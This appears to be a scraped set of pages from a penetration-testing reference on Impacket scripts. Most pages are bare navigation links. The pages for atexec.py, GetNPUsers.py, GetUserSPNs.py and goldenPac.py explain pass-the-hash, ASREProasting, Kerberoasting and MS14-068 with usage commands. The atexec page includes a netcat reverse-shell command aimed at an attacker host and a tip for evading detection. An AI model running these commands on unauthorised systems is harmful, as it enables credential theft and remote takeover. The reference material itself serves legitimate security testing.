Hacker Tools [Previousexchanger.py](https://tools.thehacker.recipes/impacket/examples/exchanger.py) [NextGetADUsers.py](https://tools.thehacker.recipes/impacket/examples/getadusers.py) Last updated 3 years ago --- # dpapi.py | The Hacker Tools [Previousdcomexec.py](https://tools.thehacker.recipes/impacket/examples/dcomexec.py) [Nextesentutl.py](https://tools.thehacker.recipes/impacket/examples/esentutl.py) Last updated 3 years ago --- # getST.py | The Hacker Tools [PreviousgetPac.py](https://tools.thehacker.recipes/impacket/examples/getpac.py) [NextgetTGT.py](https://tools.thehacker.recipes/impacket/examples/gettgt.py) Last updated 3 years ago --- # nmapAnswerMachine.py | The Hacker Tools [Previousnetview.py](https://tools.thehacker.recipes/impacket/examples/netview.py) [Nextntfs-read.py](https://tools.thehacker.recipes/impacket/examples/ntfs-read.py) Last updated 3 years ago --- # ntlmrelayx.py | The Hacker Tools [Previousntfs-read.py](https://tools.thehacker.recipes/impacket/examples/ntfs-read.py) [Nextping.py](https://tools.thehacker.recipes/impacket/examples/ping.py) Last updated 3 years ago --- # GetADUsers.py | The Hacker Tools [PreviousfindDelegation.py](https://tools.thehacker.recipes/impacket/examples/finddelegation.py) [NextgetArch.py](https://tools.thehacker.recipes/impacket/examples/getarch.py) Last updated 3 years ago --- # getPac.py | The Hacker Tools [PreviousGetNPUsers.py](https://tools.thehacker.recipes/impacket/examples/getnpusers.py) [NextgetST.py](https://tools.thehacker.recipes/impacket/examples/getst.py) Last updated 3 years ago --- # mimikatz.py | The Hacker Tools [Previouslookupsid.py](https://tools.thehacker.recipes/impacket/examples/lookupsid.py) [Nextmqtt\_check.py](https://tools.thehacker.recipes/impacket/examples/mqtt_check.py) Last updated 3 years ago --- # ntfs-read.py | The Hacker Tools [PreviousnmapAnswerMachine.py](https://tools.thehacker.recipes/impacket/examples/nmapanswermachine.py) [Nextntlmrelayx.py](https://tools.thehacker.recipes/impacket/examples/ntlmrelayx.py) Last updated 3 years ago --- # karmaSMB.py | The Hacker Tools [PreviousgoldenPac.py](https://tools.thehacker.recipes/impacket/examples/goldenpac.py) [Nextkintercept.py](https://tools.thehacker.recipes/impacket/examples/kintercept.py) Last updated 3 years ago --- # ping.py | The Hacker Tools [ping.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ping.py) allows to do an ICMP ping to an IPv4 address from the specified IPv4 interface. Sufficient rights are needed on the machine to open a raw socket. [](https://tools.thehacker.recipes/impacket/examples/ping.py#specificities) Specificities ---------------------------------------------------------------------------------------------- This script requires the following positional commands line arguments to work: * required positional argument 1: ``: the IPv4 address of the interface to use to send the ping request. * required positional argument 2: ``: the IPv4 address of the target machine to ping. Copy # Send ping requests from "192.168.10.15" to "192.168.10.16" sudo ping.py "192.168.10.15" "192.168.10.16" [Previousntlmrelayx.py](https://tools.thehacker.recipes/impacket/examples/ntlmrelayx.py) [Nextping6.py](https://tools.thehacker.recipes/impacket/examples/ping6.py) Last updated 2 years ago --- # smbpasswd.py | The Hacker Tools [Previoussmbexec.py](https://tools.thehacker.recipes/impacket/examples/smbexec.py) [Nextsmbrelayx.py](https://tools.thehacker.recipes/impacket/examples/smbrelayx.py) Last updated 3 years ago --- # Script examples | The Hacker Tools [addcomputer.py](https://tools.thehacker.recipes/impacket/examples/addcomputer.py) [atexec.py](https://tools.thehacker.recipes/impacket/examples/atexec.py) [dcomexec.py](https://tools.thehacker.recipes/impacket/examples/dcomexec.py) [dpapi.py](https://tools.thehacker.recipes/impacket/examples/dpapi.py) [esentutl.py](https://tools.thehacker.recipes/impacket/examples/esentutl.py) [exchanger.py](https://tools.thehacker.recipes/impacket/examples/exchanger.py) [findDelegation.py](https://tools.thehacker.recipes/impacket/examples/finddelegation.py) [GetADUsers.py](https://tools.thehacker.recipes/impacket/examples/getadusers.py) [getArch.py](https://tools.thehacker.recipes/impacket/examples/getarch.py) [Get-GPPPassword.py](https://tools.thehacker.recipes/impacket/examples/get-gpppassword.py) [GetNPUsers.py](https://tools.thehacker.recipes/impacket/examples/getnpusers.py) [getPac.py](https://tools.thehacker.recipes/impacket/examples/getpac.py) [getST.py](https://tools.thehacker.recipes/impacket/examples/getst.py) [getTGT.py](https://tools.thehacker.recipes/impacket/examples/gettgt.py) [GetUserSPNs.py](https://tools.thehacker.recipes/impacket/examples/getuserspns.py) [goldenPac.py](https://tools.thehacker.recipes/impacket/examples/goldenpac.py) [karmaSMB.py](https://tools.thehacker.recipes/impacket/examples/karmasmb.py) [kintercept.py](https://tools.thehacker.recipes/impacket/examples/kintercept.py) [lookupsid.py](https://tools.thehacker.recipes/impacket/examples/lookupsid.py) [mimikatz.py](https://tools.thehacker.recipes/impacket/examples/mimikatz.py) [mqtt\_check.py](https://tools.thehacker.recipes/impacket/examples/mqtt_check.py) [mssqlclient.py](https://tools.thehacker.recipes/impacket/examples/mssqlclient.py) [mssqlinstance.py](https://tools.thehacker.recipes/impacket/examples/mssqlinstance.py) [netview.py](https://tools.thehacker.recipes/impacket/examples/netview.py) [nmapAnswerMachine.py](https://tools.thehacker.recipes/impacket/examples/nmapanswermachine.py) [ntfs-read.py](https://tools.thehacker.recipes/impacket/examples/ntfs-read.py) [ntlmrelayx.py](https://tools.thehacker.recipes/impacket/examples/ntlmrelayx.py) [ping.py](https://tools.thehacker.recipes/impacket/examples/ping.py) [ping6.py](https://tools.thehacker.recipes/impacket/examples/ping6.py) [psexec.py](https://tools.thehacker.recipes/impacket/examples/psexec.py) [raiseChild.py](https://tools.thehacker.recipes/impacket/examples/raisechild.py) [rdp\_check.py](https://tools.thehacker.recipes/impacket/examples/rdp_check.py) [reg.py](https://tools.thehacker.recipes/impacket/examples/reg.py) [registry-read.py](https://tools.thehacker.recipes/impacket/examples/registry-read.py) [rpcdump.py](https://tools.thehacker.recipes/impacket/examples/rpcdump.py) [rpcmap.py](https://tools.thehacker.recipes/impacket/examples/rpcmap.py) [sambaPipe.py](https://tools.thehacker.recipes/impacket/examples/sambapipe.py) [samrdump.py](https://tools.thehacker.recipes/impacket/examples/samrdump.py) [secretsdump.py](https://tools.thehacker.recipes/impacket/examples/secretsdump.py) [services.py](https://tools.thehacker.recipes/impacket/examples/services.py) [smbclient.py](https://tools.thehacker.recipes/impacket/examples/smbclient.py) [smbexec.py](https://tools.thehacker.recipes/impacket/examples/smbexec.py) [smbpasswd.py](https://tools.thehacker.recipes/impacket/examples/smbpasswd.py) [smbrelayx.py](https://tools.thehacker.recipes/impacket/examples/smbrelayx.py) [smbserver.py](https://tools.thehacker.recipes/impacket/examples/smbserver.py) [sniff.py](https://tools.thehacker.recipes/impacket/examples/sniff.py) [sniffer.py](https://tools.thehacker.recipes/impacket/examples/sniffer.py) [split.py](https://tools.thehacker.recipes/impacket/examples/split.py) [ticketConverter.py](https://tools.thehacker.recipes/impacket/examples/ticketconverter.py) [ticketer.py](https://tools.thehacker.recipes/impacket/examples/ticketer.py) [wmiexec.py](https://tools.thehacker.recipes/impacket/examples/wmiexec.py) [wmipersist.py](https://tools.thehacker.recipes/impacket/examples/wmipersist.py) [wmiquery.py](https://tools.thehacker.recipes/impacket/examples/wmiquery.py) [PreviousKerberos](https://tools.thehacker.recipes/impacket/library/kerberos) [Nextaddcomputer.py](https://tools.thehacker.recipes/impacket/examples/addcomputer.py) Last updated 3 years ago --- # smbserver.py | The Hacker Tools [Previoussmbrelayx.py](https://tools.thehacker.recipes/impacket/examples/smbrelayx.py) [Nextsniff.py](https://tools.thehacker.recipes/impacket/examples/sniff.py) Last updated 3 years ago --- # netview.py | The Hacker Tools [Previousmssqlinstance.py](https://tools.thehacker.recipes/impacket/examples/mssqlinstance.py) [NextnmapAnswerMachine.py](https://tools.thehacker.recipes/impacket/examples/nmapanswermachine.py) Last updated 3 years ago --- # rdp_check.py | The Hacker Tools [PreviousraiseChild.py](https://tools.thehacker.recipes/impacket/examples/raisechild.py) [Nextreg.py](https://tools.thehacker.recipes/impacket/examples/reg.py) --- # mqtt_check.py | The Hacker Tools [Previousmimikatz.py](https://tools.thehacker.recipes/impacket/examples/mimikatz.py) [Nextmssqlclient.py](https://tools.thehacker.recipes/impacket/examples/mssqlclient.py) --- # sniff.py | The Hacker Tools [Previoussmbserver.py](https://tools.thehacker.recipes/impacket/examples/smbserver.py) [Nextsniffer.py](https://tools.thehacker.recipes/impacket/examples/sniffer.py) Last updated 3 years ago --- # lookupsid.py | The Hacker Tools [Previouskintercept.py](https://tools.thehacker.recipes/impacket/examples/kintercept.py) [Nextmimikatz.py](https://tools.thehacker.recipes/impacket/examples/mimikatz.py) Last updated 3 years ago --- # ticketer.py | The Hacker Tools [PreviousticketConverter.py](https://tools.thehacker.recipes/impacket/examples/ticketconverter.py) [Nextwmiexec.py](https://tools.thehacker.recipes/impacket/examples/wmiexec.py) Last updated 3 years ago --- # rpcdump.py | The Hacker Tools [Previousregistry-read.py](https://tools.thehacker.recipes/impacket/examples/registry-read.py) [Nextrpcmap.py](https://tools.thehacker.recipes/impacket/examples/rpcmap.py) Last updated 3 years ago --- # dcomexec.py | The Hacker Tools [Previousatexec.py](https://tools.thehacker.recipes/impacket/examples/atexec.py) [Nextdpapi.py](https://tools.thehacker.recipes/impacket/examples/dpapi.py) Last updated 3 years ago --- # esentutl.py | The Hacker Tools [Previousdpapi.py](https://tools.thehacker.recipes/impacket/examples/dpapi.py) [Nextexchanger.py](https://tools.thehacker.recipes/impacket/examples/exchanger.py) Last updated 3 years ago --- # kintercept.py | The Hacker Tools [PreviouskarmaSMB.py](https://tools.thehacker.recipes/impacket/examples/karmasmb.py) [Nextlookupsid.py](https://tools.thehacker.recipes/impacket/examples/lookupsid.py) Last updated 3 years ago --- # ticketConverter.py | The Hacker Tools [Previoussplit.py](https://tools.thehacker.recipes/impacket/examples/split.py) [Nextticketer.py](https://tools.thehacker.recipes/impacket/examples/ticketer.py) Last updated 3 years ago --- # ping6.py | The Hacker Tools [ping6.py](https://github.com/fortra/impacket/blob/master/examples/ping6.py) allows to do an ICMP6 ping to an IPv6 address from the specified IPv6 interface. Sufficient rights are needed on the machine to open a raw socket. [](https://tools.thehacker.recipes/impacket/examples/ping6.py#specificities) Specificities ----------------------------------------------------------------------------------------------- This script requires the following positional commands line arguments to work: * required positional argument 1: ``: the IPv6 address of the interface to use to send the ping request. * required positional argument 2: ``: the IPv6 address of the target machine to ping. Copy # Send ping requests from "2001:861:4001:14f0:d7cd:f2cc:9344:a13a" to "2001:861:4001:14f0::2791:ec35" sudo ping6.py "2001:861:4001:14f0:d7cd:f2cc:9344:a13a" "2001:861:4001:14f0::2791:ec35" [Previousping.py](https://tools.thehacker.recipes/impacket/examples/ping.py) [Nextpsexec.py](https://tools.thehacker.recipes/impacket/examples/psexec.py) Last updated 2 years ago --- # reg.py | The Hacker Tools [Previousrdp\_check.py](https://tools.thehacker.recipes/impacket/examples/rdp_check.py) [Nextregistry-read.py](https://tools.thehacker.recipes/impacket/examples/registry-read.py) Last updated 3 years ago --- # atexec.py | The Hacker Tools [atexec.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py) can be used to create and run an immediate scheduled task on a remote target via SMB in order to execute commands on a target system. It works only on version of Windows higher than Vista. The command to execute in the scheduled task must be provided to the script as a positional argument. The command's output can then be retrieved in a `.tmp` file with the same name as the scheduled task in `C:\Windows\Temp`. [](https://tools.thehacker.recipes/impacket/examples/atexec.py#commons) Commons ------------------------------------------------------------------------------------ It has the following generic command line arguments, similar to many other tools: * required positional argument #1: `[[domain/]username[:password]@]` (e.g. `domain.local/user@dc01`, `domain/user:[[email protected]](https://tools.thehacker.recipes/cdn-cgi/l/email-protection) `). ![](https://tools.thehacker.recipes/~gitbook/image?url=https%3A%2F%2F894632015-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MiRT0QHotSpofwDFs_w%252Fuploads%252FUHsmBiqakwXP7RLGzQzd%252Fimpacket_positional_arg-with%2520target.png%3Falt%3Dmedia%26token%3D93400849-4096-40c2-8f07-0a17747c6551&width=768&dpr=4&quality=100&sign=11c7227e&sv=2) required positional argument format * `-hashes`: the LM and/or NT hash to use for a [pass-the-hash](https://www.thehacker.recipes/ad/movement/ntlm/pth) (NTLM). The format is as follows: `[LMhash]:NThash` (the LM hash is optional, the NT hash must be prepended with a colon (`:`). * `-aesKey`: the AES128 or AES256 hexadecimal long-term key to use for a [pass-the-key](https://www.thehacker.recipes/ad/movement/kerberos/ptk) authentication (Kerberos). * `-k`: this flag must be set when authenticating using Kerberos. The utility will try to grab credentials from a Ccache file which path must be set in the `KRB5CCNAME` environment variable. In this case, the utility will do [pass-the-cache](https://www.thehacker.recipes/ad/movement/kerberos/ptc) . If valid credentials cannot be found or if the `KRB5CCNAME` variable is not or wrongly set, the utility will use the password specified in the positional argument for plaintext Kerberos authentication, or the NT hash (i.e. RC4 long-term key) in the `-hashes` argument for [overpass-the-hash](https://www.thehacker.recipes/ad/movement/kerberos/opth) . A Kirbi file could also be converted to a Ccache file using [ticketConverter.py](https://tools.thehacker.recipes/impacket/examples/ticketconverter.py) in order to be used by the utility (indirect [pass-the-ticket](https://www.thehacker.recipes/ad/movement/kerberos/ptt) ). * `-no-pass`: this flag must be set when an empty password will by used, or no password at all. Without this flag, the user will be prompted for a password when running the utility. This flag is especially useful when using `-k`. * `-dc-ip`: IP address of the domain controller. If omitted, the positional argument's domain part will be used (in that case, it must be a Fully-Qualified-Domain-Name (FQDN)). * `-debug`: with this flag set, the utility will be more verbose and will possibly print useful information for debug purposes. With this flag set, the utility will also print tracebacks. * `-ts`: with this flag set, the utility will prepend all output with a timestamp. [](https://tools.thehacker.recipes/impacket/examples/atexec.py#specificities) Specificities ------------------------------------------------------------------------------------------------ It also has the following specific command line arguments: * required positional argument #2: command to execute on the target system (e.g. `whoami` or `'powershell -c "nc.exe attacker_ip listener_port -e cmd.exe"'`) * `-session-id`: executes the scheduled task in the context of a specific existing logon session without using `cmd.exe`. If omitted, the session 0 will be used. * `-silentcommand`: avoid using `cmd.exe` to run the specified command. The scheduled task will run the specified command without prepending `cmd.exe /C` (e.g. `C:\Windows\System32\hostname.exe` will be executed instead of `cmd.exe /C 'hostname'`). It is useful to reduce blue team detection, however no output is available. * `-codec`: set target output encoding to a specific value. If errors are detected, run `chcp.com` on the target, map the result with [the python documentation](https://docs.python.org/3/library/codecs.html#standard-encodings) , and then execute atexec.py again with `-codec` and the corresponding codec. If omitted, `utf-8` will be used (e.g. for French systems, the `cp850` codec can be used) * `-keytab`: authenticate using Kerberos keys from a KEYTAB file. Copy # with cleartext credentials atexec.py 'DOMAIN'/'USER':'PASSWORD'@'target_ip' whoami # pass-the-hash (with an NT hash) atexec.py -hashes :'NThash' 'DOMAIN'/'USER':'PASSWORD'@'target_ip' whoami # kerberos ticket in memory atexec.py -no-pass -k 'DOMAIN'/'USER'@'target_ip' 'powershell -c "nc.exe attacker_ip 4545 -e cmd.exe"' [Previousaddcomputer.py](https://tools.thehacker.recipes/impacket/examples/addcomputer.py) [Nextdcomexec.py](https://tools.thehacker.recipes/impacket/examples/dcomexec.py) Last updated 3 years ago --- # psexec.py | The Hacker Tools [Previousping6.py](https://tools.thehacker.recipes/impacket/examples/ping6.py) [NextraiseChild.py](https://tools.thehacker.recipes/impacket/examples/raisechild.py) Last updated 3 years ago --- # rpcmap.py | The Hacker Tools [Previousrpcdump.py](https://tools.thehacker.recipes/impacket/examples/rpcdump.py) [NextsambaPipe.py](https://tools.thehacker.recipes/impacket/examples/sambapipe.py) Last updated 3 years ago --- # registry-read.py | The Hacker Tools [Previousreg.py](https://tools.thehacker.recipes/impacket/examples/reg.py) [Nextrpcdump.py](https://tools.thehacker.recipes/impacket/examples/rpcdump.py) Last updated 3 years ago --- # samrdump.py | The Hacker Tools [PrevioussambaPipe.py](https://tools.thehacker.recipes/impacket/examples/sambapipe.py) [Nextsecretsdump.py](https://tools.thehacker.recipes/impacket/examples/secretsdump.py) Last updated 3 years ago --- # smbexec.py | The Hacker Tools [Previoussmbclient.py](https://tools.thehacker.recipes/impacket/examples/smbclient.py) [Nextsmbpasswd.py](https://tools.thehacker.recipes/impacket/examples/smbpasswd.py) Last updated 3 years ago --- # smbrelayx.py | The Hacker Tools [Previoussmbpasswd.py](https://tools.thehacker.recipes/impacket/examples/smbpasswd.py) [Nextsmbserver.py](https://tools.thehacker.recipes/impacket/examples/smbserver.py) Last updated 3 years ago --- # GetNPUsers.py | The Hacker Tools [GetNPUsers.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py) can be used to retrieve domain users who have "Do not require Kerberos preauthentication" set and ask for their TGTs without knowing their passwords. It is then possible to attempt to crack the session key sent along the ticket to retrieve the user password. This attack is known as [ASREProast](https://www.thehacker.recipes/ad/movement/kerberos/asreproast) . This script can dynamically obtain the list of users in the domain * either through an [RPC null session](https://www.thehacker.recipes/ad/recon/ms-rpc#null-sessions) * or with an authenticated LDAP access to the domain (user or computer account) If the users list cannot be dynamically retrieved, a file can be supplied. [](https://tools.thehacker.recipes/impacket/examples/getnpusers.py#commons) Commons ---------------------------------------------------------------------------------------- It has the following generic command line arguments, similar to many other tools: * required positional argument: `[domain/]username[:password]` (e.g. `domain.local/user`, `domain/user:password`). ![](https://tools.thehacker.recipes/~gitbook/image?url=https%3A%2F%2F894632015-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MiRT0QHotSpofwDFs_w%252Fuploads%252FZOGpF6lFdismhYLUOkqv%252Fimpacket_positional_arg-without%2520target.png%3Falt%3Dmedia%26token%3D1c309cbd-9dca-4c83-beb3-a81f3ea34c29&width=768&dpr=4&quality=100&sign=737bfe40&sv=2) * `-hashes`: the LM and/or NT hash to use for a [pass-the-hash](https://www.thehacker.recipes/ad/movement/ntlm/pth) (NTLM). The format is as follows: `[LMhash]:NThash` (the LM hash is optional, the NT hash must be prepended with a colon (`:`). * `-aesKey`: the AES128 or AES256 hexadecimal long-term key to use for a [pass-the-key](https://www.thehacker.recipes/ad/movement/kerberos/ptk) authentication (Kerberos). * `-k`: this flag must be set when authenticating using Kerberos. The utility will try to grab credentials from a Ccache file which path must be set in the `KRB5CCNAME` environment variable. In this case, the utility will do [pass-the-cache](https://www.thehacker.recipes/ad/movement/kerberos/ptc) . If valid credentials cannot be found or if the `KRB5CCNAME` variable is not or wrongly set, the utility will use the password specified in the positional argument for plaintext Kerberos authentication, or the NT hash (i.e. RC4 long-term key) in the `-hashes` argument for [overpass-the-hash](https://www.thehacker.recipes/ad/movement/kerberos/opth) . A Kirbi file could also be converted to a Ccache file using [ticketConverter.py](https://tools.thehacker.recipes/impacket/examples/ticketconverter.py) in order to be used by the utility (indirect [pass-the-ticket](https://www.thehacker.recipes/ad/movement/kerberos/ptt) ). * `-no-pass`: this flag must be set when an empty password will by used, or no password at all. Without this flag, the user will be prompted for a password when running the utility. This flag is especially useful when using `-k`. * `-dc-ip`: IP address of the domain controller. If omitted, the positional argument's domain part will be used (in that case, it must be a Fully-Qualified-Domain-Name (FQDN)). * `-debug`: with this flag set, the utility will be more verbose and will possibly print useful information for debug purposes. With this flag set, the utility will also print tracebacks. * `-ts`: with this flag set, the utility will prepend all output with a timestamp. [](https://tools.thehacker.recipes/impacket/examples/getnpusers.py#specificities) Specificities ---------------------------------------------------------------------------------------------------- It also has the following specific command line arguments: * `-request`: the script will retrieve the crackable hash. Without this option, the script will just output vulnerable accounts, by identifying if "Do not require Kerberos preauthentication" is set or not, without actually requesting the TGT. * `-outputfile`: the file name to write the retrieved hashed values in. Without this option set, the values will be printed. * `-format`: the format to output the hashes in. It must be `hashcat` or `john`. Default is `hashcat` so that the hashes can be ingested by [hashcat](https://tools.thehacker.recipes/hashcat) . * `-usersfile`: a file with usernames to test. One username per line must be specified (just the username, no domain needed). If omitted, the script will automatically identify user accounts with "Do not require Kerberos preauthentication" in the domain via LDAP. If the `-usersfile` argument is not supplied, and no credentials are set (hashes, password, ticket), the script will try to retrieve the users list through the RPC `enumdomusers` command through an [RPC null session](https://www.thehacker.recipes/ad/recon/ms-rpc#null-sessions) . Copy # users list dynamically queried with an RPC null session GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/' # with a users file GetNPUsers.py -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/' # users list dynamically queried with a LDAP authenticated bind (password) GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password' # users list dynamically queried with a LDAP authenticated bind (NT hash) GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER' [PreviousGet-GPPPassword.py](https://tools.thehacker.recipes/impacket/examples/get-gpppassword.py) [NextgetPac.py](https://tools.thehacker.recipes/impacket/examples/getpac.py) Last updated 1 year ago --- # mssqlinstance.py | The Hacker Tools [Previousmssqlclient.py](https://tools.thehacker.recipes/impacket/examples/mssqlclient.py) [Nextnetview.py](https://tools.thehacker.recipes/impacket/examples/netview.py) Last updated 3 years ago --- # wmipersist.py | The Hacker Tools [Previouswmiexec.py](https://tools.thehacker.recipes/impacket/examples/wmiexec.py) [Nextwmiquery.py](https://tools.thehacker.recipes/impacket/examples/wmiquery.py) Last updated 3 years ago --- # getArch.py | The Hacker Tools [PreviousGetADUsers.py](https://tools.thehacker.recipes/impacket/examples/getadusers.py) [NextGet-GPPPassword.py](https://tools.thehacker.recipes/impacket/examples/get-gpppassword.py) Last updated 3 years ago --- # sambaPipe.py | The Hacker Tools [Previousrpcmap.py](https://tools.thehacker.recipes/impacket/examples/rpcmap.py) [Nextsamrdump.py](https://tools.thehacker.recipes/impacket/examples/samrdump.py) Last updated 3 years ago --- # sniffer.py | The Hacker Tools [Previoussniff.py](https://tools.thehacker.recipes/impacket/examples/sniff.py) [Nextsplit.py](https://tools.thehacker.recipes/impacket/examples/split.py) Last updated 3 years ago --- # exchanger.py | The Hacker Tools [Previousesentutl.py](https://tools.thehacker.recipes/impacket/examples/esentutl.py) [NextfindDelegation.py](https://tools.thehacker.recipes/impacket/examples/finddelegation.py) Last updated 3 years ago --- # raiseChild.py | The Hacker Tools [Previouspsexec.py](https://tools.thehacker.recipes/impacket/examples/psexec.py) [Nextrdp\_check.py](https://tools.thehacker.recipes/impacket/examples/rdp_check.py) Last updated 3 years ago --- # mssqlclient.py | The Hacker Tools [Previousmqtt\_check.py](https://tools.thehacker.recipes/impacket/examples/mqtt_check.py) [Nextmssqlinstance.py](https://tools.thehacker.recipes/impacket/examples/mssqlinstance.py) Last updated 3 years ago --- # GetUserSPNs.py | The Hacker Tools [GetUserSPNs.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py) can be used to obtain a password hash for user accounts that have an SPN (service principal name). If an SPN is set on a user account it is possible to request a Service Ticket for this account and attempt to crack it in order to retrieve the user password. This attack is named [Kerberoast](https://www.thehacker.recipes/ad/movement/kerberos/kerberoast) . This script can also be used for [Kerberoast without preauthentication](https://www.thehacker.recipes/ad/movement/kerberos/kerberoast#kerberoast-w-o-pre-authentication) . [](https://tools.thehacker.recipes/impacket/examples/getuserspns.py#commons) Commons ----------------------------------------------------------------------------------------- It has the following generic command line arguments, similar to many other tools: * required positional argument: `[domain/]username[:password]` (e.g. `domain.local/user`, `domain/user:password`). ![](https://tools.thehacker.recipes/~gitbook/image?url=https%3A%2F%2F894632015-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MiRT0QHotSpofwDFs_w%252Fuploads%252FJZk5UxyTOXEPOOnrPH8z%252Fimage.png%3Falt%3Dmedia%26token%3Df84ec716-c3a4-48cc-9dad-b03d21e97c00&width=768&dpr=4&quality=100&sign=ccda4579&sv=2) * `-hashes`: the LM and/or NT hash to use for a (NTLM). The format is as follows: `[LMhash]:NThash` (the LM hash is optional, the NT hash must be prepended with a colon (`:`). * `-aesKey`: the AES128 or AES256 hexadecimal long-term key to use for a authentication (Kerberos). * `-k`: this flag must be set when authenticating using Kerberos. The utility will try to grab credentials from a Ccache file which path must be set in the `KRB5CCNAME` environment variable. In this case, the utility will do . If valid credentials cannot be found or if the `KRB5CCNAME` variable is not or wrongly set, the utility will use the password specified in the positional argument for plaintext Kerberos authentication, or the NT hash (i.e. RC4 long-term key) in the `-hashes` argument for . A Kirbi file could also be converted to a Ccache file using in order to be used by the utility (indirect ). * `-no-pass`: this flag must be set when an empty password will by used, or no password at all. Without this flag, the user will be prompted for a password when running the utility. This flag is especially useful when using `-k`. * `-dc-ip`: IP address of the domain controller. If omitted, the positional argument's domain part will be used (in that case, it must be a Fully-Qualified-Domain-Name (FQDN)). * `-debug`: with this flag set, the utility will be more verbose and will possibly print useful information for debug purposes. With this flag set, the utility will also print tracebacks. * `-ts`: with this flag set, the utility will prepend all output with a timestamp. [](https://tools.thehacker.recipes/impacket/examples/getuserspns.py#specificities) Specificities ----------------------------------------------------------------------------------------------------- It also has the following specific command line arguments: * `-request`: the script will retrieve the crackable hash. Without this option, the script will just output vulnerable accounts by identifying the user accounts with an SPN, without actually requesting the TGS. * `-usersfile`: a file with usernames to test. One username per line must be specified (just the username, no domain needed). * `-outputfile`: the file name to write the retrieved hashed values in. Without this option set, the values will be printed. * `-request-user`: requests a Service Ticket for the SPN associated to the specified user (just the username, no domain needed). This allows to target a single specific account instead of targetting a list of user, either obtained dynamically or supplied with the `-usersfile` option. * `-save`: saves the requested Service Ticket on the disk, in the `.ccache` format. Useful for [Pass the cache](https://www.thehacker.recipes/ad/movement/kerberos/ptc) attack. This option enables `-request` as well. * `-target-domain`: allows to specify the domain of the targeted user accounts. It is useful if these accounts are in another domain or forest and the attack is run across a trust. If omitted, the domain specified in the positional argument will be used. * `-no-preauth`: this option can be used to indicate a user vulnerable to [ASREProast](https://www.thehacker.recipes/ad/movement/kerberos/asreproast) , to conduct an [Kerberoast without preauthentication](https://www.thehacker.recipes/ad/movement/kerberos/kerberoast#kerberoast-w-o-pre-authentication) attack. Copy # with a password GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password' # with an NT hash GetUserSPNs.py -outputfile kerberoastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER' # Kerberoast without preauthentication GetUserSPNs.py -no-preauth "bobby" -usersfile "services.txt" -dc-host "DC_IP_or_HOST" "DOMAIN.LOCAL"/ [PreviousgetTGT.py](https://tools.thehacker.recipes/impacket/examples/gettgt.py) [NextgoldenPac.py](https://tools.thehacker.recipes/impacket/examples/goldenpac.py) Last updated 2 years ago --- # wmiquery.py | The Hacker Tools [Previouswmipersist.py](https://tools.thehacker.recipes/impacket/examples/wmipersist.py) [NextHashcat](https://tools.thehacker.recipes/hashcat) Last updated 3 years ago --- # split.py | The Hacker Tools [Previoussniffer.py](https://tools.thehacker.recipes/impacket/examples/sniffer.py) [NextticketConverter.py](https://tools.thehacker.recipes/impacket/examples/ticketconverter.py) Last updated 3 years ago --- # getTGT.py | The Hacker Tools [PreviousgetST.py](https://tools.thehacker.recipes/impacket/examples/getst.py) [NextGetUserSPNs.py](https://tools.thehacker.recipes/impacket/examples/getuserspns.py) Last updated 3 years ago --- # secretsdump.py | The Hacker Tools [Previoussamrdump.py](https://tools.thehacker.recipes/impacket/examples/samrdump.py) [Nextservices.py](https://tools.thehacker.recipes/impacket/examples/services.py) Last updated 3 years ago --- # wmiexec.py | The Hacker Tools [Previousticketer.py](https://tools.thehacker.recipes/impacket/examples/ticketer.py) [Nextwmipersist.py](https://tools.thehacker.recipes/impacket/examples/wmipersist.py) Last updated 3 years ago --- # services.py | The Hacker Tools [Previoussecretsdump.py](https://tools.thehacker.recipes/impacket/examples/secretsdump.py) [Nextsmbclient.py](https://tools.thehacker.recipes/impacket/examples/smbclient.py) Last updated 3 years ago --- # goldenPac.py | The Hacker Tools [goldenPac.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/goldenPac.py) is an exploitation script for the [CVE-2014-6324](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets#ms14-068-cve-2014-6324) ([MS14-068](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-068) ). If the domain controller is vulnerable, it is possible to forge a [Golden Ticket](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets#ms14-068-cve-2014-6324) without knowing the `krbtgt` hash by bypassing the PAC signature verification. Because it is a Kerberos attack, the remote target and the domain MUST be specified with the FQDN and the attacker machine MUST be time synced with the domain controller. [](https://tools.thehacker.recipes/impacket/examples/goldenpac.py#commons) Commons --------------------------------------------------------------------------------------- It has the following generic command line arguments, similar to many other tools: * required positional argument #1: `[[domain/]username[:password]@]` (e.g. `domain.local/[[email protected]](https://tools.thehacker.recipes/cdn-cgi/l/email-protection) `). ![](https://tools.thehacker.recipes/~gitbook/image?url=https%3A%2F%2F894632015-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MiRT0QHotSpofwDFs_w%252Fuploads%252FUHsmBiqakwXP7RLGzQzd%252Fimpacket_positional_arg-with%2520target.png%3Falt%3Dmedia%26token%3D93400849-4096-40c2-8f07-0a17747c6551&width=768&dpr=4&quality=100&sign=11c7227e&sv=2) required positional argument format * `-hashes`: the LM and/or NT hash to use for a [pass-the-hash](https://www.thehacker.recipes/ad/movement/ntlm/pth) (NTLM). The format is as follows: `[LMhash]:NThash` (the LM hash is optional, the NT hash must 